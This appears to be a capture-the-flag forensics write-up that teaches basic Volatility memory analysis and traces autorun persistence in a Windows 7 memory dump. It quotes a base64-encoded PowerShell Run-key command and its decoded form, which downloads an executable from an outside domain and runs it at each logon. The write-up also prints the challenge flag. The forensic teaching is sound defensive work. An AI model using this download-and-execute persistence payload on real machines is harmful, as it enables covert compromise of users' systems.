intro

Intro

Persist was the forensics challenge released on day 3, where we’re given a memory dump of Santa’s computer, which reportedly has a “slow boot time and a blue window popping up for a split second during startup”. We’ll take this as a cue to investigate AutoRun Persistence in Windows, and find a Volatility plugin called “winesap” which will show us a number of registry keys, one of which that contains a suspicious PowerShell script that we can decode to get the flag.

Description

Although Santa just updated his infra, problems still occur. He keeps complaining about slow boot time and a blue window popping up for a split second during startup. The IT elves support suggested that he should restart his computer. Ah, classic IT support! Download Link: http://46.101.25.140/forensics_persist.zip

Intro to Volatility

Background

Two of the five forensics challenges during this CTF had to do with memory dumps, which many struggled with since they had never had to do memory forensics before. Since the solution to this challenge is pretty quick with the right tools, I’ll take this time to explain the basics of Volatility, the de facto tool for memory forensics.

According to the developers’ webpage, Volatility “introduced people to the power of analyzing the runtime state of a system using the data found in volatile storage (RAM). It also provided a cross-platform, modular, and extensible platform to encourage further work into this exciting area of research.”

Prior to this research, most forensics involved looking at the hard drive image. However, this method of analysis can only find things on-disk, so the running state of processes were not stored at all. The primary difference between volatile and nonvolatile memory is that volatile memory requires constant electrical current. To keep it simple, if I removed the battery from your device right now, the photos and documents you have on the disk will remain, but the state of your browser probably won’t. The browser was an active process in RAM, but the other files you had on your device weren’t being modified at all.

History and tech lesson over, let’s talk about using the tool.

Basic Usage

I’ve already downloaded the dump on my Remnux VM, as the distro already has Volatility installed. I’ll be working out of Volatility 2, since version 3 is a bit finnicky with installing the symbol libraries and all.

imageinfo is almost always the first thing you’ll use, so you can find the correct profile to give Volatility to parse the dump correctly. We also get some additional information about the OS.

remnux@remnux:~/ctf/santa/persist$ vol.py -f persist.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/remnux/ctf/santa/persist/persist.raw)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82977c68L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82978d00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-11-30 22:05:35 UTC+0000
     Image local date and time : 2021-11-30 14:05:35 -0800

From here, you’ll be able to specify the profile using the --profile flag, and then proceed to do pretty much whatever. The framework is plugin-based, so each “command” has its own subset of things to do, but we’ll only cover some basic plugins here. The pslist and the pstree plugins can be used to view the current list of processes, one as a list, and the other as a tree, respectively.

remnux@remnux:~/ctf/santa/persist$ vol.py --profile=Win7SP1x86_23418 -f persist.raw pslist
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x8413a940 System                    4      0     76      512 ------      0 2021-11-30 22:05:03 UTC+0000                                 
0x90dfebd8 smss.exe                236      4      4       32 ------      0 2021-11-30 22:05:03 UTC+0000                                 
0x856dbb00 csrss.exe               312    304      8      473      0      0 2021-11-30 22:05:03 UTC+0000                                 
0x8504c750 wininit.exe             352    304      7       90      0      0 2021-11-30 22:05:04 UTC+0000                                 
0x84f54818 csrss.exe               364    344      7      179      1      0 2021-11-30 22:05:04 UTC+0000                                 
0x858ab588 services.exe            404    352     24      265      0      0 2021-11-30 22:05:04 UTC+0000                                 
0x8571fd28 lsass.exe               412    352      9      647      0      0 2021-11-30 22:05:04 UTC+0000                                 
0x8571d838 lsm.exe                 420    352     12      188      0      0 2021-11-30 22:05:04 UTC+0000                                 
0x85875260 winlogon.exe            496    344      6      121      1      0 2021-11-30 22:05:05 UTC+0000                                 
0x85811030 svchost.exe             576    404     15      369      0      0 2021-11-30 22:05:05 UTC+0000                                 
0x85894530 VBoxService.ex          640    404     14      125      0      0 2021-11-30 22:05:05 UTC+0000                                 
...[trim]...
0x85c5bb00 userinit.exe           2656   2416      4       47      2      0 2021-11-30 22:05:19 UTC+0000                                 
0x85c5d998 dwm.exe                2664    864      4       86      2      0 2021-11-30 22:05:19 UTC+0000                                 
0x85c60ab8 explorer.exe           2676   2656     35      655      2      0 2021-11-30 22:05:19 UTC+0000                                 
0x85c8c830 VBoxTray.exe           2796   2676     16      146      2      0 2021-11-30 22:05:19 UTC+0000                                 
0x84a52d28 DumpIt.exe             3340   2676      2       37      2      0 2021-11-30 22:05:29 UTC+0000                                 
0x84a52478 conhost.exe            3352   2388      2       50      2      0 2021-11-30 22:05:29 UTC+0000                                 
0x85b363c0 dllhost.exe            3412    576      6        3      2      0 2021-11-30 22:05:36 UTC+0000

I’ve only shown the pslist output here, but you really should use both in your analysis. The goal of memory forensics is to find anomalies, or occurences that aren’t normal for the operating system. You can ignore the DumpIt.exe process; this is one of many processes that are used to actually dump the memory in practice.

The final plugin we’ll talk about for now is netscan, which can be used to basically check netstat at the time of the dump.

remnux@remnux:~/ctf/santa/persist$ vol.py --profile=Win7SP1x86_23418 -f persist.raw netscan
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x2d34e50          TCPv4    0.0.0.0:22                     0.0.0.0:0            LISTENING        268      sshd.exe       
0x2d34e50          TCPv6    :::22                          :::0                 LISTENING        268      sshd.exe       
0x205cad58         TCPv4    0.0.0.0:49156                  0.0.0.0:0            LISTENING        412      lsass.exe      
0x205cad58         TCPv6    :::49156                       :::0                 LISTENING        412      lsass.exe      
0x211f5f60         TCPv4    0.0.0.0:49156                  0.0.0.0:0            LISTENING        412      lsass.exe      
...[trim]...  
0x3e5035a8         TCPv4    0.0.0.0:445                    0.0.0.0:0            LISTENING        4        System         
0x3e5035a8         TCPv6    :::445                         :::0                 LISTENING        4        System         
0x3e527cc0         TCPv4    0.0.0.0:22                     0.0.0.0:0            LISTENING        268      sshd.exe       
0x3e614b48         TCPv4    0.0.0.0:49152                  0.0.0.0:0            LISTENING        352      wininit.exe    
0x3e614b48         TCPv6    :::49152                       :::0                 LISTENING        352      wininit.exe    
0x3e6a73b0         TCPv4    0.0.0.0:135                    0.0.0.0:0            LISTENING        696      svchost.exe    
0x3e6a73b0         TCPv6    :::135                         :::0                 LISTENING        696      svchost.exe    
0x3e6b8b88         TCPv4    0.0.0.0:135                    0.0.0.0:0            LISTENING        696      svchost.exe    
0x3e6b92c0         TCPv4    0.0.0.0:49152                  0.0.0.0:0            LISTENING        352      wininit.exe    
0x3e6daa58         TCPv4    10.0.2.15:139                  0.0.0.0:0            LISTENING        4        System         
0x3e6ed380         TCPv4    0.0.0.0:49153                  0.0.0.0:0            LISTENING        748      svchost.exe    
0x3e787770         TCPv4    0.0.0.0:49154                  0.0.0.0:0            LISTENING        904      svchost.exe    
0x3e788bf0         TCPv4    0.0.0.0:49154                  0.0.0.0:0            LISTENING        904      svchost.exe    
0x3e788bf0         TCPv6    :::49154                       :::0                 LISTENING        904      svchost.exe    
0x3e5fb770         TCPv4    10.0.2.15:49159                51.104.136.2:443     CLOSED           -1                      
0x3f1e9d08         TCPv4    0.0.0.0:49153                  0.0.0.0:0            LISTENING        748      svchost.exe    
0x3f1e9d08         TCPv6    :::49153                       :::0                 LISTENING        748      svchost.exe

There are many, many other plugins to dig into, and there are many cheat sheets online to aid you while learning how to use the tool. Also note that you can use the -h flag on any plugin to see what additional options you may have.

Grabbing the Flag

Persistence 101

Now that we have a basic understanding of the tool, let’s look back at the description. Santa is supposedly seeing “slow boot time and a blue window popping up for a split second during startup”. Given the title of the challenge, this is a huge hint. The idea of “persistence” is fairly simple: as an attacker, leave yourself some way to get back in if you lose your shell. Between Linux and Windows, there are many, many ways that this can be achieved, including SSH keys, Golden/Silver tickets, Scheduled Tasks and/or cronjobs, etc. These, by no means, are bad options, but we can go deeper.

We could be dealing with a rootkit, code that is planted at a lower-level in the operating system to maintain persistence. However, a much simpler option that matches the description would be AutoRun.

The MITRE ATT&CK Framework describes this subtechnique like so:

“Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the “run keys” in the Registry or startup folder will cause the program referenced to be executed when a user logs in. [1] These programs will be executed under the context of the user and will have the account’s associated permissions level.” – MITRE, Technique 1547.001

Basically, an attacker might have added a registry key that allows them to run a script everytime Santa boots up his computer. This is actually a lot closer to our description than the rootkit, as the Registry key is likely to contain some kind of executable or PowerShell, which might be the source of the “blue screen”.

winesap

During the CTF, I was having a lot of trouble getting the autoruns plugin to work, which is basically designed to investigate this kind of stuff. After some research into alternatives, I learned about winesap, from this very well done tutorial by 13Cubed. The TL;DW is that this paper dives deeper into the concept of “autorun persistence”, and the “winesap” plugin was developed to find anomalies.

I’ve been unable to locate the original repository for this plugin from the tutorial, but I did find a clone of it on GitHub which you can find here. I’ll clone it on my VM, and run the plugin like so.

remnux@remnux:~/ctf/santa/persist$ vol.py --plugin=winesap/ --profile=Win7SP1x86_23418 -f persist.raw winesap
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
------------------------------
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
cmFuZG9tCg: REG_SZ: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc JABQAGEAdABoACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdwBpAG4AZABvAHcAcwBcAHcAaQBuAC4AZQB4AGUAJwA7AGkAZgAgACgALQBOAE8AVAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAFAAYQB0AGgAfQBlAGwAcwBlAHsAbQBrAGQAaQByACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB3AGkAbgBkAG8AdwBzACcAOwAkAGYAbABhAGcAIAA9ACAAIgBIAFQAQgB7AFQAaAAzAHMAMwBfADMAbAB2ADMAcwBfADQAcgAzAF8AcgAzADQAbABsAHkAXwBtADQAbAAxAGMAMQAwAHUAcwB9ACIAOwBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AGkAbgBkAG8AdwBzAGwAaQB2AGUAdQBwAGQAYQB0AGUAcgAuAGMAbwBtAC8AdwBpAG4ALgBlAHgAZQAiACwAJABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABQAGEAdABoAH0AJQA=
^CInterrupted

There’s supposed to be a --match flag, but I guessed this bypassed it, somehow. We can take this base64 and decode it to see what’s up.

remnux@remnux:~/ctf/santa/persist$ echo '...[base64 from before]...' | base64 -d
$Path = 'C:\ProgramData\windows\win.exe';if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}else{mkdir 'C:\ProgramData\windows';$flag = "HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}";iex (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/win.exe",$Path);Start-Process $Path}%

Well look at that, there’s the flag.